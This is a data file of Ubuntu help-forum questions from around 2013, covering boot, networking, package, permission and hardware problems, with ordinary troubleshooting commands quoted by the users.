324174	installed 12.04 dual boot with 10.04 , fails to boot 10.04	i installed 12.04 alongside of 10.04 this evening , not an upgrade , just a side by side install . after doing a few updates , i re-booted to access 10.04 . scrolled down in the grub menu and selected the 10.04 and pressed enter . got a page with several lines and what stood out was : target file system does not have /sbin/init then a prompt with : ( initramfs ) i 've come across several posts around the net with booting to a live cd and trying to fix the hard drive to running a few script files to fix the problem . is there a single point solution to repair this ? john
324175	installed as a dual boot ubuntu 13.04 alongside win8 and no grub ?	i previously had windows 7 on my machine when i bought it i installed win8 now but i wanted to try out ubuntu so i installed alongside win8 but there was no grub screen to choose ubuntu.. if anyone knows of a way to fix this please let me know ! ! thank you
324177	how can i fix my wifi connection in lubuntu 13.04 ?	i have been running lubuntu 13.04 with the wifi working fine for a couple weeks until today , when the connection broke and was never able to reconnect successfully . the router is a motorola gateway combo which i 'm currently connected to wirelessly via my windows 7 laptop -- no problems with it as far as i can discern . perhaps importantly the problem seemed to disappear when i disabled the wpa2-psk aes encryption from the router and i was able to connect the lubuntu machine to the wifi , but then i decided to test that 'solution ' by manually disconnecting and reconnecting via networkmanager . when i attempted to reconnect to the unsecured wireless , networkmanager prompted me for a password . weird . my problem is very similar to why ca n't my wifi connect or disconnect ? except it 's occuring in lubuntu 13.04 . when i dmesg | grep wlan0 i get a series of messages like this in a loop ( i 'm not sure where the loop begins , assuming the driver messages are the end ) : wlan0 : associate with [ router mac address ] ( try 1/3 ) wlan0 : rx assocresp from [ router mac address ] ( capab=0x411 status=0 aid=5 ) wlan0 : associated wlan0 : authenticate with [ router mac address ] wlan0 : send auth to [ mac address ] ( try 1/3 ) wlan0 : authenticated rt73usb 1-8:1.0 wlan0 : disabling ht as wmm/qos is not supported by the ap rt73usb 1-8:1.0 wlan0 : disabling vht as wmm/qos is not supported by the ap notes : the messages beginning 'rt73usb ' began after the problem at hand ; 'rt73usb ' is the name of the wireless driver iwconfig yields wlan0 ieee802.11bg essid : off/any mode : managed access-point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off sudo lshw -c network yields description : wireless interface physical id : 1 bus info : usb @ 1:8 logical name : wlan0 serial : [ mac address ] capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt73usb driverversion=3.8.0-26-generic \ firmware=1.7 link=no multicast=yes wireless=ieee 802.11bg a really strange aspect of this problem is that , as far as i could tell , i had not updated any software packages for hours leading up to the connection problem . things i have tried already : 1 ) soft blocking wifi with rfkill block wifi and restarting the network-manager service with service network-manager restart 2 ) rebooting 3 ) killing wpa_supplicant and network-manager 4 ) i attempted to remove networkmanager via aptitude to replace with wicd , but was informed that lubuntu-desktop 'depends ' on network-manager { @ ! # $ # @ ! } 5 ) as mentioned before , i disabled wpa2-psk aes encryption in the router and seemed to make some headway , but could not reconnect after a manual disconnect . 6 ) i checked /var/log/apt/history.log to see what software changes had been made but the problem started today ( 7.24.2013 ) and history.log just has a start-date and end-date with the same date/time stamp . does anyone have any ideas as to what could have caused this ? has anyone successfully removed network manager from lubuntu and replaced it ?
324180	new file default execution permission ?	i ca n't figure out why i do n't have execution permissions on files i create by default . i do n't think i messed with any ubuntu permissions , it 's pretty default stuff . when doing some research i found out about a thing called umask , running umask returns 0002 i do n't think that 's the problem . i 've tried creating files in a bunch of different folders , they all look like -rw-rw-r -- . farzher @ farzher-laptop ~ $ touch pants.txt -rw-rw-r -- 1 farzher farzher 0 jul 24 21:58 pants.txt i know how to execute it chmod 755 pants.txt but i want execute by default . if i 'm missing any important information just comment and ask .
324184	is there an mac emulator ?	i really like the wine , a complete .exe emulator . but i would like to use an mac os x theme , so , i would like to use the `` made for mac '' programs . where can i download this emulator - if it exists ? thanks gabriel
324187	how does linux know how to execute shell vs machine code ?	./something how does linux know how to execute this if it 's a shell script , or compiled machine code ? i understand how the shebang works , but there does n't seem to be anything like that here .
324194	internet does n't work decently , i 'm hardly regretting for chosing ubuntu	the internet connects but it does n't works decently , i ca n't download or update things using the terminal or the ubuntu program central because the server does n't answers or because it asks for constant authentication and then does n't downloads it . at firefox ( i ca n't even download chrome ) websites do n't load well , but when i download certain things , like a windows 7 iso the internet speed is completely normal . i guess it can be some kind of blocking , i do n't know . thanks for the attention .
324201	can i add more diskspace for extra use ?	am i able to add more disk space to the os ? i did the default during the install , and wondering in case i ever needed to allocate more .
324202	dpkg : error processing python-minimal ( -- configure )	when i run sudo apt-get upgrade , the dpkg error appears and interupts the process . error details : setting up python-minimal ( 2.7.3-0ubuntu7.1 ) ... traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/runpy.py '' , line 162 , in _run_module_as_main `` __main__ '' , fname , loader , pkg_name ) file `` /usr/local/lib/python2.7/runpy.py '' , line 72 , in _run_code exec code in run_globals file `` /usr/local/lib/python2.7/compileall.py '' , line 16 , in < module > import struct file `` /usr/local/lib/python2.7/struct.py '' , line 1 , in < module > from _struct import * importerror : no module named _struct dpkg : error processing python-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 255 dpkg : dependency problems prevent configuration of python : python depends on python-minimal ( = 2.7.3-0ubuntu7.1 ) ; however : package python-minimal is not configured yet . and this problem leads to a series of dependency problems when processing the following packages : python gwibber-service libgwibber3 libgwibber-gtk3 gwibber gwibber-service-facebook gwibber-service-identica gwibber-service-twitter python-all python-dev python-all-dev python-apt python-problem-report python-apport python-libxml2 unity-lens-gwibber unity-scope-video-remote any helps are appreciated ! ^_^ edit : finally , nothing i can do for this problem . and several days later , the root directory is full and i even could not uninstall any software because of this problem . so what i can do is just to reinstall the system . ╮（╯＿╰）╭
324208	setup new profile , deleted my profile , and now new user has no admin rights	so i bought a used laptop and set up the latest version of ubuntu on it . i initially set it up with a user profile and password for myself , but decided to give the computer away to a friend who needed it . i created her profile without a password , and then deleted my profile . she lives far away and has told me she has no admin rights , and can not install a plug-in that she needs . we both do n't know a lot about computers or ubuntu . what instructions can i give her so that she can gain admin rights and be allowed to install software ?
324212	unable to connect ethernet in ubuntu	sir , i am beginner to linux . i have been trying to get internet access via ethernet in my ubuntu 11.04 but have failed to do so . whenever i attach ethernet cable , it starts scrolling ( signaling that it has detected the ethernet cable ) . but does n't end up connecting to internet . apurv @ apurv : ~ $ lspci -knn | grep -i net -a2 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 13 ) subsystem : dell device [ 1028:02aa ] kernel driver in use : sky2 -- 0c:00.0 network controller [ 0280 ] : intel corporation wifi link 5100 [ 8086:4232 ] subsystem : intel corporation wifi link 5100 agn [ 8086:1321 ] kernel driver in use : iwlagn apurv @ apurv : ~ $ rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no
324213	assistance request - failed to fetch	ubuntu 13.04 — new clean install — after second round of updating — update via terminal revealed following : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch h ... : //archive.canonical.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'archive.canonical.com : http ' ( -11 - system error ) w : failed to fetch h ... : //extras.ubuntu.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) e : some index files failed to download . they have been ignored , or old ones used instead . same symptoms on same dual boot ( win7 ) machine with 13.04 updated directly from 12.10 ideas to clean up the update process ? thank you for your assistance .
324220	audigy 2 nx and hardware mute buttons	i have an old creative soundblaster audigy2 nx that i would like to use it and the bundled remote for xbmc . i have everything working except i have an hardware mute button as well as mute on remote i have never been able to program the remote in a way to get mute and unmute to work . i believe there may be some interfaces missing in the alsa mixer/controls support , such as hardware mute status and `` master playback switch '' is clearly missing from the mixer when i use mute and unmute on logitech keyboard all is well except no `` mute '' indicator lights on audigy . i can then unmute normally when i use the remotes mute function ( which is also configured to send a mute via xbmc ) , or the mute on audigy unit itself , the `` mute '' indicator on audigy lights up . unit can only be unmuted with amixer -c 1 cset numid=5 0 followed by amixer -c 1 cset numid=5 1 i suspect this second ( hardware ? ) mute is differentand probably done at the hardware level and with `` master playback switch '' can this get worked into the configuration as a quirk or something with the driver for the audigy 2 nx ? the following may be helpful amixer controls shows among other items numid=5 , iface=mixer , name='master playback switch' must always mute with : amixer -c 1 cset numid=5 0 then we can always unmute with : amixer -c 1 cset numid=5 1 seems i have the solution but need to customize alsa somehow ! update ... the logitech keybkoard mute is handled by the default ubuntu installation ( it just works ) , so i do not know what component handles it . the sound card mute seems to be hardware and activates name='master playback switch ' as noted previously
324222	how to check battery status with the ubuntu sdk ?	i am developing an app and i need to monitor the battery status , with the sdk how do i obtain the devices ( phone ) battery status ? can this be done with javascript ?
324223	ubuntu 13.04 `` the system is running in low-graphics mode '' error ?	i 've been trying to work at this error all day . apparently it 's a pretty common error . that does n't have one exact solution . i 've spent all day typing different commands into the terminal such as : changing the greeter ( sudo nano /etc/lightdm/lightdm.config ) reinstalling drivers ( sudo apt-get install nvidia-current , sudo apt-get install fglrx ) freeing some space out by using sudo apt-get autoclean i 've literally tried everything , i 've seen on the web . i installed ubuntu for the first time ever yesterday and it was working fine all day but it turned out to this , this morning . now one thing that might be a problem is that i tried installing wine yesterday and apparently it did n't install properly and everytime i run a command in terminal it tells me that wine was n't installed correctly or somewhere along the lines of that . i would really appreciate if someone could give me their solution of which i have n't tried already . i 'm using a dell latitude d620 . thanks !
324228	installaton error in php5	i am using ubuntu 12.04lts i try to inslall php5 it create an error `` 1.could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) 2.unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? ''
324229	how can i give windows permission to one of my ext3 partitions in ubuntu ?	i have an ext3 partition i would like to share with windows . i have the ext2fsd driver for windows , which works great . i can view all of my ubuntu files from windows . the only problem is that i do n't have write access to this partition . is there any way i can give all permissions to everything so that i can write from windows ? i do n't really mind giving up security on the partition , so any suggestions are appreciated .
324233	loosing my win 8 loosing my ubuntu this is the problem !	i have installed ubuntu with win 8 but at first step it blocked my win8 ! unfortunately i had to reinstall my win8 & all of my program . i 've search your site so it seems the problem is because of grub ! so i 've used these codes which i found in your site : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update and after that these sudo apt-get install -y boot-repair & & ( sudo boot-repair & ) and then boot & repair which unfortunately i 've lost my win 8 again ! ! ! ! so i 've reinstall my win but there is no boot menu at starting my pc to choose ubuntu or win 8 and my pc runs with win 8 ! ! ! so please help me to use lovely ubuntu with my win 8 together without loosing anything ! additionally i am beginner with ubuntu . thank you .
324236	how can i use chromecast	i just saw the video about chromecast and i am interested in knowing how can i enable this on my ubuntu pc . my tv has an hdmi port .
324237	booting problem with my ubuntu 10.4	when i start my ubuntu desktop version it shows target file system does n't have /sbin/init . how can i resolve that problem ? it starts with initramfs . pls solve my problem as soon as possible
324238	what is the name of the music/artist from ubuntu edge teaser ?	what 's the music from the teaser trailer ? i mean the artist and name . i kinda like it !
324242	postgresql starting error	the postgresql 9.1 database server is not starting . can anyone help in this . * restarting postgresql 9.1 database server * removed stale pid file . the postgresql server failed to start . please check the log output : 2013-07-25 10:59:52 ist panic : could not read from control file : input/output error [ fail ] thanks in advance .
324243	clean installation of ubuntu	currently i have windows 7 but i want to completly remove windows 7 and install ubuntu 13.04 . i have 5 windows partitions including c : drive . i just want to know whether i will loose all my partitions in windows . i want to keep the data on those partitions which include my all important data . is there a way of doing clean installation of ubuntu without losing data on windows partitions ? what happens if i move all my data into one windows partition ( assume to last windows partition i.e e : ) and then format all other four windows partitions ( then ubuntu advance partition menu will identify this total space as a free space ) and use advance partition menu to create /boot , / , /home and swap area ? will i be able to extend or merge that windows e : partition to my ubuntu home partition after i boot into ubuntu ? what other types of partitions that we can have in ubuntu if we want to keep our movies , personnel documents and study materials in each separate partitions ? ( like i did in windows )
324248	how to load a apllication to the memory using shell scripting ?	how to load a apllication to the specified memory address using shell scripting concept . ( sh/bash )
324249	how to do tab completion with files that starts with special characters	i am unable to open a pdf file which starts with ( . for example : ( 3311 ) m3n78-em.pdf are there any arguments to be given ? i have invoked with evince command . when i type evince ( and press tab , nothing happens . in other words , tab completion does n't work after ( . can anyone help ?
324250	what languages used to for linux os ?	what programming languages used to make/create linux operating systems os
324257	removing specific characters in string	i am currently writing a bash script and i have obtained a list of file locations . however i have notice that some file locations have spaces in the file name such as eg . : /1 2 3.txt such files affects the use of commands such as cp in my case . using `` '' and escaping it results in a space after the `` '' . for e.g : `` /1 2 3.txt '' with a space in front of the file location , i obtained an error stating `` cp : can not stat ` /1 2 3.txt ' : no such file or directory `` . is there any other method to quote a file location with `` '' so that the cp command can be used ?
324260	installing ubuntu with wubi	i want to try ubuntu . i am planing to install it with wubi and i have ubuntu 12.04 in my pc . it is about 700 mb . it is not in the iso format . the wubi installer is placed inside the ubuntu folder . when i try to install ubuntu with wubi it is again trying to download the same 700mb file from net . can you please tell me how to install it . i do n't want to download it again..
324261	./configure no such file or directory even after installing build essentials	i 'm trying to install java se 7 on my ubuntu 13.04 . i have already downloaded tar.gz file and extracted . but when i wrote in terminal : ./configure i saw this message bash : ./configure : no such file or directory i see it even after installing build essentials package . any idea ?
324262	help with installing cheese from package ( 12.04 lts )	i need help with installing cheese 3.8.3 from the package i downloaded on the website . the instructions attached with the file are n't clear enough for me .
324269	ubuntu 13.04 is operating too slow while plugged in for charging	hardware : • 8gb ram • 1tb hard disk • amd a8 quad core processor my problem is : as soon as i plug in my computer for charging , my system performance gets extremely slow . please help me out .
324272	gnome panel buttons not working on with gnome 3	i am running under ubuntu 13.04 , i installed gnome 3.8 and working perfectly . however , i this superior bar where i can log out and see the sound , bluetooth and network settings , if i click on either sound , bluetooth , or network settings , just anything will appear . i had the same problem with change background setting after i right clicked on desktop , but i enabled the file manager to handle desktop option in tweaktool . i just ca n't see where i can fix this ... any ideas ?
324280	conky disappears when using ctrl+super+d	when using the desktop shortcut conky disappears . i also do n't want it always in front though . is there a solution to just display conky on the desktop , but hide it when every other application has focus ? i 'm using ubuntu 13.04 . edit : a good solution exists here : http : //ubuntuforums.org/showthread.php ? t=1689954
324288	wireless icon seen in tray but no wireless networks are seen	have ubuntu 12.04.2 lts installed to an asus eeepc with intel ( r ) celeron ( r ) m processor 900mhz , 2053mb memory the wireless icon is seen in the tray but no wireless networks are seen . no issues ever seen since ubuntu install 5 months ago . the wireless networks of others are no longer seen . guidance sought ... supporting information uploaded to personal online folder : https : //skydrive.live.com/redir ? resid=1727c265a60f257a ! 409 & authkey= ! abw4qmwbdz3mgei
324291	ca n't log in after a shutdown apparently deleted my user account	last night , i was working on the computer normally , and then i want to turn it off , so my first problem was when i press the power button upper-right , it opens the box but tiny and empty so i thought that after reboot everything will be fine , so i actually opened terminal and typed : shutdown -- help and shutdown told me what are the options i selected : shutdown -p 1 after one minute , the hdd got busy for about 5 seconds and everything shutdown , i meant not normal shutdown , in the normal shutdown , he closes the programs , then close gnome and terminate all remaining process and shutdown . but here nothing closed , simple everything is off i thought also that i choosed wrong shutdown option and i didnt worried about it the next night , i turned on my pc and i was extremely surprised ! my user account is deleted ! plus the background and other setting are back to default , but not sure if all settings resetted cause the wifi still connects automaticlly and now im writing this question on my ubuntu signed in as guest also , the login button still available , but it requires username and the password , im very sure i type them correctly but he says wrong ! so the only way i can access my ubuntu is guest , and i have no permission to do everything , and also , my user folder is still available in /home/yousef/ ( yousefs is my username ) however , i cant access him due permission issues please help i really appreciate everything , i cant loose my os , im learning c programming and i made a lot of projects ! ! moreover , i thing my account was deleted before reboot . summery : after reboot , ubuntu was fully resetted and my account was deleted ! ! installed ubuntu 13.04 , dual-boot with windows 8 ** guys new problem ! ! ! ! i have rebooted to enter recovery mode , i did a check disk and it stopped at 0.3 % , i rebooted again and now it dos n't boot , i had to enter recovery mode and choose resume to boot up , and now everything lags , even the mouse cursor also the screen resolution is down to 1024x768 rather than 1366x768 and the screen is now identified as `` laptop '' , i want to tell you that my hdd s.m.r.a.t reports that the hdd life will ned in 1 year , so is my hdd destroying ? ? need quick answer since i have very very important data **
324297	qr code generator for pdf file	can a pdf file which contains icons , links , and text be used to generate qr code ? if yes , do we have any software in ubuntu 12.04 repository , or are there any online solution for this problem ? as a background , i will generate a qr code of a pdf which is at most 3 page , and use it in the docs file and then create pdf of this docs and , for offline usage , share two file as one .
324298	chmod folder permissions to access by http	i have this ubuntu web server and i want to give permissions to access only by http but i do n't want the folder to be visible to the network users . i have a subfolder were users upload some files and i want to hide that too . can i do it with chmod ? how ?
324301	how can i adjust the preferred wifi order ?	i am using 13.04 ubuntu . i want to make order on multiple wireless access . is there any way to do this ?
324303	why do you see 'removing additional packages ' during the ubuntu installation ?	i just installed ubuntu 12.04 lts and was very surprised ( and amused : ) ) about the install-window showing the status information : '' zusatzpakete werden entfernt '' ( means something like `` removing additional packages '' ) seems very weird to me that in an installation , additional packages are removed ... why have they been installed in first place ? well , not that bad , i used windows for decades now , i just had the small hope that the linux world would be a little bit saner ; d
324307	delete folder option not available in ubuntu one	i have stopped syncing a couple of folders and now want to delete them from the cloud storage in ubuntu one - the delete option is not available when i click on the `` more '' button . what can i do ? ps - i would post a screenshot but as this is my 1st post . . . .
324310	dual boot for a windows 8 laptop	i 'm trying to dual boot my laptop with windows 8 and linux . can someone supply me with instructions of an easy way to do this ? thank you .
324313	uninstall ubuntu in dual boot with windows 8	i installed wubi on my windows 8 pc two days ago and when the installation was complete i rebooted my pc but ubuntu did not ran so deleted ubuntu folder in drive c where windows 8 was already installed and but now every time i boot up it asks me to choose windows 8 and ubuntu ( like i still have dual boot ) . what should i do to remove this old wubi/ubuntu ?
324320	how does one build android kernel from sources on ubuntu 13.04	i am trying to build android from sources on ubuntu 13.04 , yet there are numerous issues : setting up the environment issues ( wrong tool chains ) compilation/build errors
324327	why ca n't i install any packages using apt-get ?	i ca n't install any packages using apt-get . for example this is the error i get while trying to install macchanger or anything for that matter : cody @ ubuntu : ~/desktop $ sudo apt-get install macchanger reading package lists ... done building dependency tree reading state information ... done e : the package google-chrome-stable : i386 needs to be reinstalled , but i ca n't find an archive for it . cody @ ubuntu : ~/desktop $ it 's very strange and it would be a big help if someone could tell me how to fix this problem . by the way , i 'm running ubuntu 12.04 lts and i believe it 's 32-bit edit : i cant open my ubuntu package manager either . it opens for about two seconds then closes .
324328	where to get a codec pack for ubuntu 13.04 ?	how to download and install a codec pack , like k-lite codec pack for windows , for ubuntu 13.04 and from where ? i 'm new to ubuntu and not a developer .
324329	will the ubuntu edge work in countries without lte ?	i live in a country with no lte , we use 3g . will the edge still work here ? thanks
324341	how to install programs on ubuntu 12.04	hi i 'm a youtuber and i need to install my arcsoft showbiz capture software but when i put the disc in it comes up with raw files and wont run the set-up menu , also when i try to download things from the internet it wont let me open them it comes up with raw files and wont start the program .
324343	ubuntu phone to be instal on a samsung device	can i instal ubuntu on my samsung galaxy s advance ? if yes , what are the procedures ?
324347	how can i change permissions on external drives right after formatting with gparted ?	using gparted , i have formatted an external hdd to ext4 . as it turns out the default is that i have no write access . how can i change permissions on external drives ?
324350	my ubuntu is uber lag	i had just installed ubuntu 12.04 on my old sony vaio laptop . specs are 4gb ram , core 2 duo 1.53 ghz and geforce 9300m graphics . i used the windows installer to install ubuntu to my laptop and i 'm now using the unity 2d . everything i do is lagging . using firefox , or even opening files . the laptop will just randomly lag or freeze . is there anything that i can do or is it because of the windows installer ? should i clear out my windows and use solely linux ? or is my graphics or ram being a problem , as i see some people can still run even only with 2gb of ram .
324352	only one file system is placed in my computer	i am using ubuntu 12.04 . i had partitioned 320 gb as follows , 77gb , ext2 , mount=/boot 77gb , ext3 , mount=/ 77gb , ext4 , mount=/home 77gb , reiserfs , mount=/usr 13 gb swap . in this partitions i ca n't use any areas except /home . how can i re-partition ?
324354	are there any tablets that support ubuntu ?	i have been using ubuntu on desktops and laptops for years and i am looking at buying my first tablet . i would love to use ubuntu on it and i 'm wondering if there are any tablets that i could install ubuntu on from a usb without any dramas . or is this still a work on progress ?
324357	clustered node computers	i 'm new to ubuntu and currently running ubuntu 12.04.2 lts . i have seen many questions regarding clustering computers , and i was wondering if i can use the node computers as standalone computers or are they only `` raw computing power '' ? meaning : is it only the server computer i can use with a screen ? just wanted to know before i jump into the challenge . hope you understand my question .
324366	would like to have windows back	so i tried to install ubuntu , it wasnt going wery well , so i decided to stop it . i manually stopped my computer , booted it up and i get `` mbr error 1 '' insert floppy . i launched my bios panel , and i do not have windows boot manager anymore . i tried to install ubuntu on my external hdd , though i needed to reformat and stuff , could i have picked the wrong hdd ? could i have picked the one with windows on it ? and how can i fix this problem , its kinda annoying , ca n't use my pc . i use windows 7 .
324369	having loaded and installed ubuntu 12.04.2 my display is very large	my screen on my acer aspire 7720 is giving me problems so i use a digital tv make saba this screen works ok at resolutions up to 1024 x 768 with windows vista , 7 , and windows server 2012 . but when i run ubuntu it detects a cvt 46 inch monitor and gives me a display of over 2560 x basically i ca n't change it in settings as i ca n't get everything in the window and i ca n't select what i need to reduce the picture size . how do i sort this out ?
324371	skip records containing no field separator in awk	in awk , i am using / as the field separator . however , there are some records in the input file that do not contain this field separator . how does awk behave for such records ? is there any way to tell awk to skip such records ?
324380	i 'm trying to install ubuntu on my 32-bit windows 7 ( acer )	i downloded the usb installation thing that ubuntu released in 2012 . now i 'm installing it and when it 's 99 % complete it shows an error like 'some file not found'
324383	how should i partition my drive for my ubuntu installation ?	so firstly i 'm going to dual boot windows and ubuntu ( windows already installed ) and am wondering how i should partition my other drive , which is completely empty . do i just need one massive partition , or smaller partitions ? its formatted as ntfs or whatever it is , the windows standard . i 'm planning to install ubuntu 13.04 and am relatively new , ive used wubi but now i want the real experience . just one quick bonus question , how can i distinguish between drives in the installation process . i 've heard bad stories about choosing the wrong drive . also i can not disconnect and hard drives as i 'm not going to go fiddle around inside my laptop : ) thanks in advance : )
324390	12.10 does n't boot after installation	i still need help today i updated 12.04 to 12.10 , but when my pc reboots after the installation , i get a black screen and noting happens . i have an acer aspire t650 . i think it has something to do with the ati xpress 200 driver , but i do n't know how can i install another driver from the boot window ? can somebody help me ? edit i used this how do i set 'nomodeset ' after i 've already installed ubuntu ? but now i get a purple screen with the ubuntu logo but it does n't load
324391	where is the web app api documentation ?	the api reference for unity web apps seems to have disappeared . there 's a link from http : //developer.ubuntu.com/resources/platform/api/12-10/ to `` web developer documentation '' , but it 's broken . does this documentation still exist somewhere ?
324392	graphic card drivers	i installed ubuntu on my hp probook 4740s . when i tried to install new graphic card drivers , unity does n't start , or worse , i get the low graphic mode ( and the screen freezes ) . i have tried installing the drivers directly from the manufacturer and changing the drivers in the additional hardware driver menu from the default setting . i would rather install them directly from the manufacturer . perhaps this is helpful : output of lspci | grep vg 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames [ radeon 7550m/7570m/7650m ]
324397	install flask as a virtual environment whith virtualenv.py in 12.10	i am trying to follow this tutorial to learn flask . i have never used python before and a relatively new to linux too so sorry if i am asking a very basic question . i have installed python version 2.7.5 and am now trying to create the virtual environment for flask . i downloaded virtualenv.py and ran the command this command : python virtualenv.py flask then get this error . new python executable in flask/bin/python can not find sdist setuptools-*.tar.gz can not find sdist pip-*.tar.gz thanks in advance for any help .
324398	persistent cpu throttling	i like to disable 'turboboost ' and set the maximum cpu speed to a lower value . that means that ongoing calculations would take some more time , but on the other hand the computer runs quiter and has a better battery life , and maybe even more calculations per battery charge . i tried something like echo 2000000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq as root for every cpu core . however , this setup is lost if i restart the system , and even on every standby cycle . where to put this commands to make the change permanent ? how can i enable an unprevileged user to invoke this command and adjust the frequency on his demand ?
324400	trying to put kik on my ubuntu 13.04	i would like to use kik on my laptop . i am new to programming . hp probook 4430 's 64 processor i have wine but dont know how to use it .
324406	vi default editor - command-line find/replace	new to linux : - ) in my .bashrc i have set -o vi . that way when i 'm in the terminal i can press ctrl + { and then use vi commands to navigate , edit and search the command history . one thing i can not figure out is how to find and replace . let 's say for example , i have the following command cp /abc/*.src /def/*.src . how can i find/replace src with trg ? to clarify , i 'm not in the vi/vim editor . i 'm on the command-line . for example , on the command-line to access the last command , i can do the following : ctrl + { k then to append to the end of command i can do : $ a how can i change my command using find/replace on the command-line . thanks
324410	extraction of incomplete .rar file	i added a torrent for download about a month ago which is in .rar format . unfortunately , it does n't seem to proceed any further than 91.01 % due to unavailability of seeders . whenever i try to open or extract the torrent i get the following error : an error occurred while loading the archive . command line output : ? ? ? - the file header is corrupt . i am using archive manager to extract the file . is there any possibility of extracting the file using any method ?
324414	package 'tomcat7 ' has no installation candidate on ubuntu 12.04	i 'm trying to install tomcat 7 on ubuntu server 12.04 with : sudo apt-get install tomcat7 i tried to do this according this install tutorial , but immediately i receive this answer : reading package lists ... done building dependency tree reading state information ... done package tomcat7 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'tomcat7 ' has no installation candidate update : i tried to download & install tomcat7 step by step as this tutorial . but when i try to run program ` $ ./catalina.sh run` i catch few warnings + severe : can not start server . server instance is not configured : nazar_art @ nazar-desctop : /usr/local/tomcat/apache-tomcat-7.0.42/bin $ ./catalina.sh run using catalina_base : /usr/local/tomcat/apache-tomcat-7.0.42 using catalina_home : /usr/local/tomcat/apache-tomcat-7.0.42 using catalina_tmpdir : /usr/local/tomcat/apache-tomcat-7.0.42/temp using jre_home : /usr/lib/jvm/java-7-oracle using classpath : /usr/local/tomcat/apache-tomcat-7.0.42/bin/bootstrap.jar : /usr/local/tomcat/apache-tomcat-7.0.42/bin/tomcat-juli.jar jul 25 , 2013 8:49:54 pm org.apache.catalina.startup.catalina load warning : unable to load server configuration from [ /usr/local/tomcat/apache-tomcat-7.0.42/conf/server.xml ] jul 25 , 2013 8:49:54 pm org.apache.catalina.startup.catalina load warning : permissions incorrect , read permission is not allowed on the file . jul 25 , 2013 8:49:54 pm org.apache.catalina.startup.catalina load warning : unable to load server configuration from [ /usr/local/tomcat/apache-tomcat-7.0.42/conf/server.xml ] jul 25 , 2013 8:49:54 pm org.apache.catalina.startup.catalina load warning : permissions incorrect , read permission is not allowed on the file . jul 25 , 2013 8:49:54 pm org.apache.catalina.startup.catalina start severe : can not start server . server instance is not configured . how to solve this trouble and install tomcat7 ?
324416	kubuntu instead of ubuntu on grub	i installed ubuntu 13.04 . then i installed too kde plasma environment . then i removed kde . everything went fine . i can now log with ubuntu ( unity ) . only ( small ) remaining problem : on the boot page ( grub ) , the command line does not show `` ubuntu 13.04 '' but `` kubuntu 13.04 '' . is there a way to fix this little inconvenience ? thanks in advance .
324417	swap space too little	my machine is running ubuntu 12.10 with gnome 3.6 ; i have 2gb of ram and i have allocated 1 gb of swap space during installation . and i am not running out of it anytime ( as i 'm aware/think so ) , acording to my swap memory applet the average is around 10-15 % . but i am still a way less that recommended , as here explained . could i be facing any potential problem about it ? if so , what ? and should i increase my swap space anyway ? p.s . i have read about the importance of swap partition . also about how to increase swap space in ubuntu ? and more ... but i could n't find the answer i am looking for .
324422	multiple x sessions in virtual terminals	i installed multiple different window managers over the past day to play around with , but they do n't seem to work . i 've been launching them from virtual terminals with `` startx -- :1 twm '' or the like . 1 ) there 's always a shell window onscreen with no prompt . this occurs in every window manager , including unity ( but not the default one on tty7 ) . commands do n't work , except for ctrl+c , which dumps me to a text-only terminal . 2 ) if i switch to another virtual terminal , upon my return the window manager will be gone and be replaced by the output of the x server . it stays running , however . anyone have any clues ?
324423	how to access the last return value in bash ?	simple scenario : i 'm looking for a wsdl file lost in the middle of a project . $ find -name '*.wsdl' ./some/very/very/long/way/to/some/lost/directory/filename.wsdl now that i know where it is , i want to do something with this file , say edit it . instead of copy/pasting the path behind my command , is it possible to use the path returned by find earlier ? just like it 's possible to access the last argument you 've typed with ! $ or you last command with ! ! . i 've read that it was possible with $ ? , but it only returns me an error : 0 : command not found $ echo $ ? 0 : command not found
324438	squid proxy with ncsa_auth	i 'm trying to setup a squid proxy with ncsa_auth but i cant find ncsa_auth on my system i installed squid with apt-get install squid as i understand it it should be installed with squid , anyone know of another way to install it or why it was n't installed in the first place ? $ dpkg -l squid / . /usr /usr/share /usr/share/doc /usr/share/doc/squid /usr/share/doc/squid/copyright /usr/share/doc/squid/readme /usr/share/doc/squid/changelog.debian.gz
324440	is it possible to change just the header of a file ?	there is a command called file that can recognize multiple file types both by the headers and by the contents of the files ( when they are plain text ) . i would like to know if there is a way to alter a file just to its header . to make an mp3 file look like a rar archive , for example , but letting the rest of the file intact . so , when you want , you can change the header of the file back to mp3 and it will work as before . is this even possible with software available in ubuntu or in general ?
324441	haswell integrated/nvidia graphics issue	i recently purchased a lenovo y510p laptop . the laptop has an nvidia geforce gt750m graphics card . supposedly the laptop does n't have integrated graphics but after installing ubuntu 13.04 and installing the nvidia drivers i 've discovered that my system is using the integrated graphics instead of the nvidia card and no matter what i do i ca n't seem to get the nvidia card activated . i 've googled the heck out of the issue with no success . anyone have any ideas ?
324450	using ubuntu on windows phone 7	i was wondering if anyone has heard of or knows and plans for ubuntu on nokia lumia 610 . i am fed up with the current operating system on nokia lumia 610 and i want to replace it with ubuntu , or if ubuntu is not currently available i would like to replace it with any other operating system which is stable . thank you for taking your time to read my question . m.aslam
